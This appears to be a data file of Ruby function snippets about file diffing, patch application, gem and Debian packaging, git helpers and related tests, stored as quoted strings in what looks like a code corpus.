"def patched\n vendored.collect do |dep|\n # TODO: right now just handling git based alternate sources,\n # should be able to handle other types bundler supports\n # (path and alternate rubygems src)\n next unless dep.source.is_a?(Bundler::Source::Git)\n src = dep.source\n\n # retrieve gem\n gem = if src.version\n Polisher::Gem.new(:name => dep.name, :version => src.version)\n else\n Polisher::Gem.retrieve(dep.name)\n end\n\n # retrieve dep\n git = Polisher::Git::Repo.new :url => src.uri\n git.clone unless git.cloned?\n git.checkout src.ref if src.ref\n\n # diff gem against git\n gem.diff(git.path)\n end.compact!\n end",
"def do_diff(base_path, path)\n if base_path.nil?\n # If there's no base path, then the file\n # must have been added\n puts(\"Added: #{path}\")\n name = path\n elsif path.nil?\n # If there's no new path, then the file\n # must have been deleted\n puts(\"Removed: #{base_path}\")\n name = base_path\n else\n # Otherwise, the file must have been modified\n puts \"Modified: #{path}\"\n name = path\n end\n\n # Set up labels for the two files\n base_label = \"#{name} (original)\"\n label = \"#{name} (new)\"\n\n # Output a unified diff between the two files\n puts \"=\" * 78\n differ = Svn::Fs::FileDiff.new(@base_root, base_path, @root, path)\n puts differ.unified(base_label, label)\n puts\n end",
"def touch_dependency source, specfile\n expect( cover_source_by( source, specfile)).to be_true\nend",
"def modified_files\n `git diff --cached --name-only --diff-filter=ACM --ignore-submodules=all`.split \"\\n\"\n end",
"def bootstrap_sh_has_been_modified\n \n modified = git.modified_files.include?(\"bootstrap.sh\")\n return modified\n \nend",
"def parse_pkg_diff(diffs)\n packages = []\n diffs.each do |diff|\n package = case diff[0]\n when '-' then removed_package(diff)\n when '+' then installed_package(diff)\n when '~' then updated_package(diff)\n end\n packages.push(package)\n end\n\n packages\n end",
"def isSourceStale?(sourcefile, targetext)\n\t\ttargetfile = toBuildDirFile(changeExt(sourcefile, targetext))\n\t\treturn (isStale?(targetfile, [sourcefile]))\n\tend",
"def legacy_repos\n Gem.sources.reject do |source_uri|\n source_uri = URI.parse source_uri\n spec_path = source_uri + \"specs.#{Gem.marshal_version}.gz\"\n\n begin\n @fetcher.fetch_size spec_path\n rescue Gem::RemoteFetcher::FetchError\n begin\n @fetcher.fetch_size(source_uri + 'yaml') # re-raise if non-repo\n rescue Gem::RemoteFetcher::FetchError\n alert_error \"#{source_uri} does not appear to be a repository\"\n raise\n end\n false\n end\n end\n end",
"def runDiffOperation(new_output, old_output, diff_folder)\n #Searching for New & updated files\n @files = Dir.glob(new_output+\"**/**\")\n for file in @files\n partName=file.split(new_output).last \n if (File.directory?(file))\n if !File.exist?(old_output+partName)\n if !File.exist?(diff_folder+partName)\n createFolder(diff_folder+partName)\n puts \"Dir Created -\" + partName\n else\n puts \"Target Dir Exists -\" + partName\n end\n end\n else\n #New file copy operation\n if !File.exist?(old_output+partName) \n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil\n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + diff_folder+folder\n end\n File.copy(file,diff_folder+folder)\n puts \"New File Copied -\"+file +\" to \"+diff_folder+folder\n #Updated file copy operation\n elsif !(File.compare(file,old_output+partName))\n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil \n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + diff_folder+folder\n end\n File.copy(file,diff_folder+folder)\n puts \"Updated File Copied -\"+file +\" to \"+diff_folder+folder\n end\n end\n end\n #Searching for Deleted files & creating the list\n deletedFileList=diff_folder+\"deletedFiles.list\"\n timestamp = Time.now.to_s()\n deletedFileName=\"\"\n deletedFilesCount=0;\n @files = Dir.glob(old_output+\"**/**\")\n for file in @files\n partName=file.split(old_output).last\n check=partName.include?'search/'\n if !File.exist?(new_output+partName) && !check\n if !(File.directory?(file))\n deletedFileName=partName.split(\"/\").last\n open(deletedFileList, 'a') { |f|\n f.puts deletedFileName\n }\n end\n# deletedFileName= timestamp +\"\\t\"+deletedFileName\n deletedFilesCount=deletedFilesCount+1 \n end\n end\n if Dir.glob(diff_folder+\"**/**\") .length==0\n if (File.directory?(diff_folder))\n Dir.rmdir(diff_folder)\n end\n if (File.directory?(@book_update_folder))\n Dir.rmdir(@book_update_folder)\n end \n puts \"No Changes made\"\n exit\n end\nend",
"def changed_files_since_deploy\n if File.exists?(\"log/latest-REVISION-syntaxcheck\")\n revision = File.read(\"log/latest-REVISION-syntaxcheck\").chomp\n\n `git whatchanged #{revision}..HEAD`.split(\"\\n\").select{|l| l =~ /^\\:/}.collect {|l| l.split(\"\\t\")[1]}.sort.uniq\n else\n puts \"log/latest-REVISION-syntaxcheck not found. run 'cap fetch_currently_deployed_version' to get it\"\n []\n end\n end",
"def test_verify_package_checksum\n assert_nothing_raised('verify good checksum') { Tpkg::verify_package_checksum(@pkgfile) }\n\n # Add a few characters to the inner checksummed tarball and test that\n # it now fails the checksum verification\n tar = Tpkg::find_tar\n Dir.mktmpdir('workdir') do |workdir|\n system(\"#{tar} -C #{workdir} -xf #{@pkgfile}\") || abort\n File.open(File.join(workdir, 'testpkg-1.0-1', 'tpkg.tar'), 'a') do |file|\n file.write('xxxxxx')\n end\n badpkg = Tempfile.new('tpkgtest')\n system(\"#{tar} -C #{workdir} -cf #{badpkg.path} testpkg-1.0-1\") || abort\n assert_raise(RuntimeError, 'verify bad checksum') { Tpkg::verify_package_checksum(badpkg.path) }\n end\n\n # Confirm that checksum verification also fails on something that isn't a valid package\n puts '#'\n puts '# Errors expected here'\n puts '#'\n boguspkg = Tempfile.new('tpkgtest')\n boguspkg.puts('xxxxxx')\n boguspkg.close\n assert_raise(RuntimeError, NoMethodError, 'verify bogus non-tarball') { Tpkg::verify_package_checksum(boguspkg.path) }\n # And for completeness how about something that is a tarball but not a valid package\n boguspkg2 = Tempfile.new('tpkgtest')\n system(\"#{tar} -cf #{boguspkg2.path} #{boguspkg.path}\")\n assert_raise(RuntimeError, NoMethodError, 'verify bogus tarball') { Tpkg::verify_package_checksum(boguspkg2.path) }\n end",
"def runDiffOperation(new_output, old_output, diff_folder)\n #Searching for New & updated files\n @files = Dir.glob(new_output+\"**/**\")\n for file in @files\n partName=file.split(new_output).last \n if (File.directory?(file))\n if !File.exist?(old_output+partName)\n if !File.exist?(diff_folder+partName)\n createFolder(diff_folder+partName)\n puts \"Dir Created -\" + partName\n else\n puts \"Target Dir Exists -\" + partName\n end\n end\n else\n #New file copy operation\n if !File.exist?(old_output+partName) \n folder= partName.split(partName.split(\"/\").last).first\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + partName\n end\n File.copy(file,diff_folder+folder)\n puts \"New File Copied -\"+file\n #Updated file copy operation\n elsif !(File.compare(file,old_output+partName))\n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil \n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + partName\n end\n File.copy(file,diff_folder+folder)\n puts \"Updated File Copied -\"+file\n end\n end\n end\n #Searching for Deleted files & creating the list\n deletedFileList=diff_folder+\"deletedList.list\"\n timestamp = Time.now.to_s()\n deletedFileName=\"\"\n deletedFilesCount=0;\n @files = Dir.glob(old_output+\"**/**\")\n for file in @files\n partName=file.split(old_output).last\n if !File.exist?(new_output+partName)\n if (File.directory?(file))\n deletedFileName=partName + \"/\"\n else\n deletedFileName=partName\n end\n# deletedFileName= timestamp +\"\\t\"+deletedFileName\n open(deletedFileList, 'a') { |f|\n f.puts deletedFileName\n }\n deletedFilesCount=deletedFilesCount+1 \n end\n end\n if Dir.glob(diff_folder+\"**/**\") .length==0\n if (File.directory?(@book_prod_final_update_folder))\n Dir.rmdir(@book_prod_final_update_folder)\n end\n if (File.directory?(diff_folder))\n Dir.rmdir(diff_folder)\n end\n if (File.directory?(@book_update_folder))\n Dir.rmdir(@book_update_folder)\n end \n puts \"No Changes made\"\n exit\n end\nend",
"def tarball\n Dir[\"#{dest}/#{SCOPE}-#{gemspec.name}-#{gemspec.version}.tgz\"].first\n end",
"def copy_files\n message \"Checking for existing #{@@app_name.capitalize} install in #{install_directory}\"\n files_yml = File.join(install_directory,'installer','files.yml')\n old_files = read_yml(files_yml) rescue Hash.new\n \n message \"Reading files from #{source_directory}\"\n new_files = sha1_hash_directory_tree(source_directory)\n new_files.delete('/config/database.yml') # Never copy this.\n \n # Next, we compare the original install hash to the current hash. For each\n # entry:\n #\n # - in new_file but not in old_files: copy\n # - in old files but not in new_files: delete\n # - in both, but hash different: copy\n # - in both, hash same: don't copy\n #\n # We really should add a third hash (existing_files) and compare against that\n # so we don't overwrite changed files.\n\n added, changed, deleted, same = hash_diff(old_files, new_files)\n \n if added.size > 0\n message \"Copying #{added.size} new files into #{install_directory}\"\n added.keys.sort.each do |file|\n message \" copying #{file}\"\n copy_one_file(file)\n end\n end\n \n if changed.size > 0\n message \"Updating #{changed.size} files in #{install_directory}\"\n changed.keys.sort.each do |file|\n message \" updating #{file}\"\n copy_one_file(file)\n end\n end\n \n if deleted.size > 0\n message \"Deleting #{deleted.size} files from #{install_directory}\"\n \n deleted.keys.sort.each do |file|\n message \" deleting #{file}\"\n rm(File.join(install_directory,file)) rescue nil\n end\n end\n \n write_yml(files_yml,new_files)\n end",
"def brewfile_has_been_modified\n \n modified = git.modified_files.include?(\"Brewfile\")\n return modified\n \nend",
"def source_modified_or_dest_missing?(source_path, dest_path); end",
"def patch(diffs)\n @hash = nil # invalidate any cached image\n\n Dir.chdir(root) do\n diffs.each do |diff|\n flag, key, v1, _ = diff\n # if key =~ /\\[/\n # keyname = key.match(/^(.*)\\[\\]$/).captures\n # elsif key =~ /\\./\n # keyname, subkey = key.match(/^(.*)\\.(.*)$/).captures\n # else\n # keyname = key\n # end\n\n dirname, filename, fieldname = Treet::Repo.filefor(key)\n filepath = \"#{dirname}/#{filename}\"\n\n case flag\n when '~'\n # change a value in place\n # load the current data & overwrite with the new value\n # idempotent: this will overwrite the file with the same contents\n if fieldname\n # hash entry\n data = File.exists?(filepath) ? JSON.load(File.open(filepath)) : {}\n data[fieldname] = v1\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n else\n # string entry\n File.open(filepath, \"w\") {|f| f << v1}\n end\n\n when '+'\n # add something\n if fieldname\n # writing a value into a hash\n # idempotent: this will overwrite the file with the same contents\n data = File.exists?(filepath) ? JSON.load(File.open(filepath)) : {}\n data[fieldname] = v1\n Dir.mkdir(dirname) unless Dir.exists?(dirname)\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n else\n # writing an entire hash into an array entry\n # idempotent: this will overwrite the file with the same contents\n subfile = \"#{dirname}/#{Treet::Hash.digestify(v1)}\"\n Dir.mkdir(dirname) unless Dir.exists?(dirname)\n case v1\n when Hash\n # hash entry\n File.open(subfile, \"w\") {|f| f << JSON.pretty_generate(v1)}\n else\n # string entry - create empty file with this name\n FileUtils.touch(subfile)\n end\n end\n\n when '-'\n # remove something\n if fieldname\n # this is a key in a subhash\n if File.exists?(filepath)\n # if the subhash is missing, there's nothing to remove, so do nothing (for idempotence)\n data = JSON.load(File.open(filepath))\n data.delete(fieldname)\n if data.empty?\n # all keys have been removed, clean up the file\n File.delete(filename)\n else\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n end\n end\n elsif dirname == \".\"\n # this is a top-level string\n File.delete(filename) if File.exists?(filename) # need the existence check for idempotence\n else\n # this is an array, we look for a match on the entire contents via digest\n subfile = \"#{dirname}/#{Treet::Hash.digestify(v1)}\"\n File.delete(subfile) if File.exists?(subfile) # need the existence check for idempotence\n # TODO: if dirname is now empty, should it be removed? is that worthwhile?\n end\n end\n end\n end\n\n to_hash # ?? return the patched data? or no return value? true/false for success?\n end",
"def updated_source_file; end",
"def test_git_diff_to_a\n work_tree = Dir.mktmpdir\n begin\n Dir.chdir(work_tree) do\n `git init`\n `git commit --allow-empty -m 'init'`\n `git worktree add --quiet child`\n Dir.chdir('child') do\n result = Git.open('.').diff.to_a\n assert_equal([], result)\n end\n end\n ensure\n FileUtils.rm_rf(work_tree)\n end\n end",
"def check_update(component_def, spec, gem_name_to_version)\n component_def.each_line do |line|\n # TODO: Some of the component files handle multiple versions with a case statement (for example net-ssh). \n # Add more logic to compare each of those versions. For now there are only a hand full. \n if line =~ /pkg.version/\n ver = Gem::Version.new(line.scan(/\\d\\.*/).join(''))\n if gem_name_to_version[spec.name] > ver\n warn \"Update needed for: #{spec.name} \\nUpgrade from #{ver} to #{gem_name_to_version[spec.name]}\\n\\n\"\n end\n end\n end\nend",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd,\n prefix: \"apaka-\",\n logfile: nil,\n include_removal: false\n )\n Dir.chdir(directory) do\n Packager.debug (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n cmd = [\"dpkg-source\", \"--commit\"]\n cmd << \"--include-removal\" if include_removal\n cmd << \".\"\n cmd << prefix + patch_name\n\n if !system(*cmd,\n [:out, :err] => redirection(logfile,\"a\"),\n :close_others => true)\n raise RuntimeError, \"#{self.class}#{__method__}: failed to commit #{patch_name}\"\n end\n end\n end",
"def compareDirs( relative = \"\" )\n # Combine the base path with the relative path\n original = File.expand_path( File.join( $original, relative ) )\n backup = File.expand_path( File.join( $backup, relative ) )\n\n # Return if this directory has been excluded\n if $options[:ignore].include?( original ) or $options[:ignore].include?( backup )\n $skippedCount += 1\n STDOUT.puts \"SKIP: Skipping comparison of [#{original}] and [#{backup}]\"\n return\n end\n\n # Make sure both directories exist\n unless File.directory?( original ) and File.directory?( backup )\n STDOUT.puts \"DIR: [#{original}] not found in [#{backup}]\"\n $diffCount += 1\n $diffCount += countItems( original ) if $options[:count]\n return\n end\n\n # If both directories exist, we check their contents\n begin\n Dir.foreach( original ) do |item|\n next if item == \".\" or item == \"..\"\n $itemCount += 1\n\n origPath = File.join( original, item )\n backupPath = File.join( backup, item )\n\n if File.directory? origPath\n # Skip symlinks if told to do so...\n if File.symlink?( origPath ) and not $options[:follow]\n $skippedCount += 1\n STDOUT.puts \"SYMLINK: [#{origPath}] skipped.\"\n next\n end\n # Stay on one filesystem if told to do so...\n outerDev = File::Stat.new( original ).dev\n innerDev = File::Stat.new( origPath ).dev\n if outerDev != innerDev and $options[:one_filesystem]\n $skippedCount += 1\n STDOUT.puts \"DIFFFS: [#{origPath}] is on a different file system. Skipped.\"\n next\n end\n compareDirs( File.join( relative, item ) )\n else # It's a file\n unless sameFile( origPath, backupPath )\n $diffCount += 1\n STDOUT.puts \"FILE: [#{origPath}] not found at, or doesn't match [#{backupPath}]\"\n end\n end\n end # Dir.foreach\n rescue Errno::EACCES\n STDOUT.puts \"ERROR: Can't read directory [#{original}]\"\n $errorCount += 1\n end\nend",
"def test_should_not_patch_without_fuzz\n @options[:fuzz] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_with_fuzz_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal (patched_file == file_contents('foo.rb')), false\n end",
"def find_files(src,dest,options)\r\n src_files = self.find_as_relative( src, options[:excludes] )\r\n dest_files = self.find_as_relative( dest, options[:excludes] )\r\n\r\n # output target files\r\n puts \" 元フォルダ:\" + src_files.size.to_s + \"件\" if self.debug?\r\n puts \"同期先フォルダ:\" + dest_files.size.to_s + \"件\" if self.debug?\r\n #pp src_files if self.debug?\r\n sleep 1 if self.debug?\r\n\r\n #両方にあるファイル名で中身が違うもので src の方が古いもの\r\n same_name_files = (dest_files & src_files)\r\n same_name_files.reject!{|e|\r\n #ファイルが同じモノは省く\r\n next unless File.exists?( File.expand_path(e,dest))\r\n puts \"compare file bin. #{e}\" if self.debug? || self.verbose?\r\n $stdout.flush if self.debug?\r\n FileUtils.cmp( File.expand_path(e,src) , File.expand_path(e,dest) ) \r\n } if options[:strict]\r\n same_name_files.reject!{|e|\r\n #ファイルサイズが同じモノを省く(全部比較する代替手段)\r\n next unless File.exists?( File.expand_path(e,dest))\r\n puts \"size/mtime compare #{e}\" if self.debug? || self.verbose?\r\n File.size(File.expand_path(e,src)) == File.size( File.expand_path(e,dest))\r\n #&& File.mtime(File.expand_path(e,src)) == File.mtime( File.expand_path(e,dest) )\r\n } unless options[:strict]\r\n if options[:update] then\r\n same_name_files= same_name_files.select{|e|\r\n puts \"mtime is newer #{e}\" if self.debug? || self.verbose?\r\n (File.mtime(File.expand_path(e,src)) > File.mtime( File.expand_path(e,dest)))\r\n }\r\n end\r\n if options[:overwrite] == false then\r\n same_name_files= same_name_files.reject{|e|\r\n puts \"can over write? #{e}\" if self.debug? || self.verbose?\r\n (File.exists?(File.expand_path(e,src)) && File.exists?( File.expand_path(e,dest)))\r\n }\r\n end\r\n $stdout.flush if self.debug?\r\n files_not_in_dest = (src_files - dest_files)\r\n #files\r\n files =[]\r\n files = (files_not_in_dest + same_name_files ).flatten\r\n files\r\n end",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
"def test_change_file_with_fuzz_patch\n @options[:fuzz] = 2\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_with_fuzz_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal patched_file_with_fuzz, file_contents('foo.rb')\n end",
"def diff(other_sha1)\n git \"diff #{other_sha1} -- #{@path}\"\n end",
"def diff_to_compare; end",
"def apply_diff(diff)\n diff.deltas.each do |d|\n case d.status\n when :deleted\n remove_file(d.new_file[:path])\n File.delete(File.join(path, path))\n when :added, :modified\n add_file(d.new_file[:path])\n when :renamed\n remove_file(d.old_file[:path])\n File.delete(File.join(path, path))\n add_file(d.new_file[:path])\n else\n logger.warn(\"File has a status of #{d.status}\")\n end\n end\n end",
"def test_file_size_differs\n TestHelper::FillContents($source_dir, {\n 'A.txt' => {\n type: 'file',\n contents: 'SuperLongFileThatHasLotsOfStuff',\n }\n })\n TestHelper::FillContents($backup_dir, {\n 'A.txt' => {\n type: 'file',\n contents: 'ShortFile',\n }\n })\n expected_results = {\n items_processed: 2,\n similarities: 1,\n differences: 1,\n skipped: 0,\n errors: 0,\n }\n actual_results = TestHelper::RunVerification(\n [$source_dir, $backup_dir]\n )\n assertResultsAsExpected(expected_results, actual_results)\n end",
"def compare(upstream_source)\n same = {}\n diff = {}\n upstream_source.deps.each do |d|\n spec_reqs = self.requirements_for_gem(d.name)\n spec_reqs_specifier = spec_reqs.empty? ? nil :\n spec_reqs.collect { |req| req.specifier }\n\n if spec_reqs.nil?\n diff[d.name] = {:spec => nil,\n :upstream => d.requirement.to_s}\n\n elsif !spec_reqs.any? { |req| req.matches?(d) } ||\n !self.has_all_requirements_for?(d)\n diff[d.name] = {:spec => spec_reqs_specifier,\n :upstream => d.requirement.to_s}\n\n elsif !diff.has_key?(d.name)\n same[d.name] = {:spec => spec_reqs_specifier,\n :upstream => d.requirement.to_s }\n end\n end\n\n @metadata[:requires].each do |req|\n next unless req.gem?\n\n upstream_dep = upstream_source.deps.find { |d| d.name == req.gem_name }\n\n if upstream_dep.nil?\n diff[req.gem_name] = {:spec => req.specifier,\n :upstream => nil}\n\n elsif !req.matches?(upstream_dep)\n diff[req.gem_name] = {:spec => req.specifier,\n :upstream => upstream_dep.requirement.to_s }\n\n elsif !diff.has_key?(req.gem_name)\n same[req.gem_name] = {:spec => req.specifier,\n :upstream => upstream_dep.requirement.to_s }\n end\n end unless @metadata[:requires].nil?\n\n {:same => same, :diff => diff}\n end",
"def test_ut_diff_result_02\n original_file = OriginalFile.new(\n :source_name => \"simple 1\",\n :path => \"http\",\n :normal_result_id => 349898,\n :hirisk_result_id => 4564,\n :critical_result_id => 45 )\n assert_equal(\"simple 1\",original_file.source_name)\n assert_equal(349898,original_file.normal_result_id)\n assert_equal(4564,original_file.hirisk_result_id)\n assert_equal(45,original_file.critical_result_id)\n assert_equal(\"http\",original_file.path)\n end",
"def test_tar\n\tx = \"test_tar\"\n\t@output = @s.archive({ 'files'=> [@test_directory_1_Path], 'format'=>'tar' , 'recurse'=>false } )\n\t#puts @output['archiveFile']\n\t\n\t@testid= 1\n\tTar.open(@output['archiveFile'], File::RDONLY, 0644, Tar::GNU | Tar::VERBOSE) do |tar|\n while tar.read # or 'tar.each do ...'\n #puts tar.pathname\n\t\t\n\t\t\n # tar.print_long_ls\n\n if tar.reg? && tar.pathname!=\"test_directory_1/.DS_Store\" # regular file\n tar.extract_file('test')\n\t\t want = File.read(File.join(@testdir, tar.pathname))\n\t\t puts tar.pathname\n\t\t #asserting bar1,2,3 from tar file is same as original bar1,2,3\n\t\t assert_log( want, File.read('test'), $log, x, @testid)\n end\n end\n\n ##if extract all files\n #tar.extract_all\n end\n\n\n ##for gzip archive\n #Tar.gzopen('foo.tar.gz', ...\n\n ##for bzip2 archive\n #Tar.bzopen('foo.tar.bz2', ...\n \n \n \n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def main\n last_good_root = from_file($cache_dir + '/root.txt') ||\n from_file('config/root.txt') ||\n raise(\"Can't find root.txt\")\n\n repository = Gem::TUF::Repository.new(\n root: JSON.parse(last_good_root),\n bucket: FileCachingBucket.new(HttpBucket.new($host))\n )\n\n gem_name = ARGV.shift\n\n specs = repository.target('latest_specs.4.8.gz')\n raise \"could not find latest_specs.4.8.gz\" unless specs\n specs = unmarshal_gz specs\n gem = specs.detect {|x| x[0] == gem_name } || raise(\"Can't find gem #{gem}\")\n\n gem_with_version = \"#{gem[0]}-#{gem[1]}\"\n gem_path = \"gems/#{gem_with_version}.gem\"\n gemspec_path = \"quick/Marshal.4.8/#{gem_with_version}.gemspec.rz\"\n\n repository.target(gemspec_path)\n repository.target(gem_path)\n\n puts \"Downloaded #{gem_path} and #{gemspec_path}\"\nend",
"def needs_pushing?(dir = Dir.pwd)\n rval = false\n branch = get_branch\n if is_origin_branch? branch\n Dir.chdir(dir) do\n rval = (%x{git diff \"#{branch}\"..origin/\"#{branch}\"}.size > 0)\n end\n end\n rval\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git :clone => [\n \"--quiet\",\n \"https://github.com/velpradeep/react-rails-template-app.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git :checkout => branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def dependency_fresh?(environment, dep)\n path, mtime, hexdigest = dep.pathname.to_s, dep.mtime, dep.digest\n\n stat = environment.stat(path)\n\n # If path no longer exists, its definitely stale.\n if stat.nil?\n return false\n end\n\n # Compare dependency mime to the actual mtime. If the\n # dependency mtime is newer than the actual mtime, the file\n # hasn't changed since we created this `Asset` instance.\n #\n # However, if the mtime is newer it doesn't mean the asset is\n # stale. Many deployment environments may recopy or recheckout\n # assets on each deploy. In this case the mtime would be the\n # time of deploy rather than modified time.\n if mtime >= stat.mtime\n return true\n end\n\n digest = environment.file_digest(path)\n\n # If the mtime is newer, do a full digest comparsion. Return\n # fresh if the digests match.\n if hexdigest == digest.hexdigest\n return true\n end\n\n # Otherwise, its stale.\n false\n end",
"def git_diff_next\n unstaged_git_files.each do |unstaged_file|\n if unstaged_file.untracked?\n `echo UNTRACKED FILE #{unstaged_file.filename} >&2`\n copy_to_clipboard(unstaged_file)\n break\n elsif unstaged_file.deleted?\n `echo DELETED FILE #{unstaged_file.filename} >&2`\n copy_to_clipboard(unstaged_file)\n break\n elsif !unstaged_file.has_unstaged_changes?\n next\n else\n copy_to_clipboard(unstaged_file)\n exec \"git diff #{unstaged_file.filename}\"\n end\n end\nend",
"def update\n `cd #{__dir__} && git pull origin master`\n install\nend",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def cleanup_extract_source(attrs={})\n\n execute \"cleanup_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"rm -rf #{attrs['src_dir']}\"\n not_if do ! FileTest.directory?(attrs['src_dir']) end\n action :run\n end\n\n extract_flags = \"tar zxf\" if attrs['src_file'] =~ /tar\\.gz/\n extract_flags = \"tar jxf\" if attrs['src_file'] =~ /tar\\.bz2/\n extract_flags = \"7za x\" if attrs['src_file'] =~ /7z/\n\n execute \"extract_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"#{extract_flags} #{Chef::Config[:file_cache_path]}/#{attrs['src_file']}\"\n action :run\n end\n\nend",
"def test_delete_file_patch\n @options[:strip] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_new_file_patch\n patches << bake_delete_file_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Only foo.rb should stay in /lib, bar.rb should be gone\n assert_raises(RuntimeError, 'File not found') {\n file_contents(File.join @lib_dir, 'bar.rb')\n }\n end",
"def list_local_patches(patchdir)\n if File.directory?(patchdir)\n file_list = Dir.entries(patchdir)\n file_list.each do |local_file|\n if local_file.match(/zip$/)\n puts local_file\n end\n end\n end\nend",
"def changed_files\n DeliveryTruck::Helpers.changed_files(\n DeliveryTruck::Helpers.pre_change_sha(node),\n node['delivery']['change']['sha'],\n node\n )\n end",
"def build_appdynamics\n old_filepath = \"source/appdynamics-php-agent-linux_x64-#{@source_input.version}.tar.bz2\"\n filename_prefix = \"#{@filename_prefix}_linux_noarch_any-stack\"\n\n if File.exist?(old_filepath)\n merge_out_data(old_filepath, filename_prefix)\n else\n HTTPHelper.download(@source_input, old_filepath)\n @out_data[:sha256] = Sha.get_digest(old_filepath, \"sha256\")\n @out_data[:url] = @source_input.url\n end\n end",
"def diff_url\n return unless last_deployment\n return if deployment.sha == last_deployment.sha\n \"https://github.com/#{deployment.repository}/compare/#{last_deployment.sha[0..5]}...#{deployment.sha[0..5]}\"\n end",
"def test_ruby_unix_like_date_past_same_year\n Timecop.freeze(Time.utc(2009, 1, 1)) do\n assert_equal Time.utc(2009, 1, 1), Net::FTP::List.parse(@dir.raw).mtime\n end\n Timecop.freeze(Time.utc(2008, 4, 1)) do\n assert_equal Time.utc(2008, 3, 11, 7, 57), Net::FTP::List.parse(@other_dir.raw).mtime\n end\n end",
"def new_version?\n package_branch.new_version?(self.unit)\n end",
"def diff2; end",
